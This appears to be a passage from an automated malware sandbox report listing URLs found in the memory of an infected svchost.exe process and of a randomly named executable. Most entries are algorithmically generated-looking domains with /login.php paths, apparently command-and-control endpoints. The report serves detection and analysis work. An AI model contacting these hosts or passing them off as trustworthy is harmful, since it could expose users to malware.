Source: svchost.exe, 00000002.00000003.1912922539.0000000005A34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662045970.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1938865838.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1663533223.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930763259.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664428957.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911176076.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1661481983.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664828097.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopymit.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopymyc.com/
Source: svchost.exe, 00000002.00000003.1876769792.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopypec.com/login.php
Source: svchost.exe, 00000002.00000003.1735890542.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1697918003.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804173388.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084955856.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824916487.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2082300647.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839980751.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyrem.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyrik.com/login.php
Source: svchost.exe, 00000002.00000003.1580949078.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590381869.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582128544.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582064020.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589646686.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599420800.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyzuc.com/login.php
Source: svchost.exe, 00000002.00000003.2560852053.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560976455.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1696068911.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695615652.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1696189199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693423214.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.00000000092BD000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.0000000009307000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://vowycac.com/login.php
Source: svchost.exe, 00000002.00000003.1666672208.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1951392830.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1674611166.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084955856.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1675004112.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2082300647.00000000033C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowycok.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1844960136.000000000CCB4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1845988945.000000000CCB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowycut.com/
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735890542.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1697918003.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804173388.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695615652.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824916487.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565184265.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839980751.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475543388.000000000335E000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.000000000127A000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.000000000934D000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.00000000012C0000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.00000000013D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowydef.com/login.php
Source: svchost.exe, 00000002.00000003.1912922539.0000000005A34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669257529.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1940902998.000000000CC51000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1913918462.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowyguf.com/login.php
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660041223.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1938865838.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694910479.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661492032.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590845275.0000000000893000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930763259.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2695107852.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2689279210.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2682843779.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661870675.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1872492908.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589828940.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591143916.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911176076.00000000033C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowykaf.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656159137.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1657341633.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656157026.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowymom.com/login.php
Source: svchost.exe, 00000002.00000003.1629387199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633515874.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1630932773.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1630421381.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632737159.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1873623051.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871689135.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1629462087.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633198974.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowypek.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowyqyt.com/login.php
Source: svchost.exe, 00000002.00000003.1685885238.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683417197.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683897508.000000000088E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowyrec.com/
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1636514869.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowyrif.com/login.php
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661492032.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2689279210.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599420800.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowyrym.com/login.php
Source: svchost.exe, 00000002.00000003.1522565965.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523100959.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651524701.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1872492908.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2609086285.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowyzuk.com/login.php
Source: svchost.exe, 00000002.00000003.2664767542.0000000003FD4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2687870645.0000000000861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708640819.000000000CCC0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696169271.00000000033F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2693529547.000000000323F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2695107852.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2668722349.000000000CC63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww25.lyxynyx.com/login.php?subid1=20241112-0426-0467-9c46-ef7d79ef9150
Source: svchost.exe, svchost.exe, 00000002.00000003.1683821239.0000000005A29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1648068445.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1655699259.000000000CCE5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1522947923.00000000032A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792452110.00000000032A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1981123376.000000000F280000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649930029.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632991036.00000000032AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1637900165.00000000032BA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792459921.000000000338D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1657433087.000000000CC91000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881318684.000000000CC79000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1737220209.0000000005A61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879077050.000000000CC7D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639879384.000000000326A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1905400482.000000000CCDE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1739913087.000000000CCD6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1648826141.0000000000875000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1731174745.000000000CCE4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1815491501.000000000CCE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: svchost.exe, 00000002.00000003.1655699259.000000000CCE5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677711627.000000000CC8D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466997109.000000000337A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879077050.000000000CC7D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1905400482.000000000CCDE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559620956.0000000005A1C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1852061199.0000000005AA9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1638510682.000000000CCD6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1809367795.0000000005A9E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1809367795.0000000005A92000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735224157.0000000005A6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581032516.000000000327B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1663534768.0000000005A0D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1631665579.000000000CC7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469670760.000000000331D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662318974.000000000CCE9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600469380.00000000032AD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1659665081.0000000005A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2011810643.000000000CC91000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1631973606.00000000032BB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677711627.000000000CC8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comt
Source: svchost.exe, 00000002.00000003.2046005839.000000000CC82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2011810643.000000000CC82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comt-
Source: svchost.exe, 00000002.00000003.1475968169.0000000000863000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604239614.00000000008C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1660420575.000000000CCD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comtC
Source: svchost.exe, 00000002.00000003.1677711627.000000000CC94000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1844292183.0000000005AA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comtN
Source: svchost.exe, 00000002.00000003.1638510682.000000000CCD6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.00000000008C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1667217481.000000000CCD5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1654486120.000000000CCD5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1790516365.000000000CCD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comte
Source: svchost.exe, 00000002.00000003.1475968169.0000000000867000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1654486120.000000000CCD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comtv
Source: svchost.exe, 00000002.00000003.1690843138.0000000005AC4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498566877.000000000328D000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.0000000009322000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.0000000009270000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1960183690.0000000009470000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007F93000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007F64000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
Source: svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696169271.00000000033F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651367571.00000000033F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2666830881.00000000033F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1741320070.0000000003345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lysyvan.com/
